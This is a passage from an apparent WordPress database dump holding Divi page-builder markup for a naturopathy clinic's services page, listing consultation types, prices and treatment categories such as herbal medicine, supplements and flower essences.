such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>\n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" width=\"100%\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.\n\n \n\n[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]\n<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>\n\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>[et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]</p>\n<!-- /wp:paragraph -->','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 19:58:39','2025-04-01 11:58:39','',424,'https://verdenaturopathy.com.au/?p=429',0,'revision','',0),(325,1,'2021-06-15 12:40:51','2021-06-15 04:40:51','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\">Discounts available for children under 12, students and seniors</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" 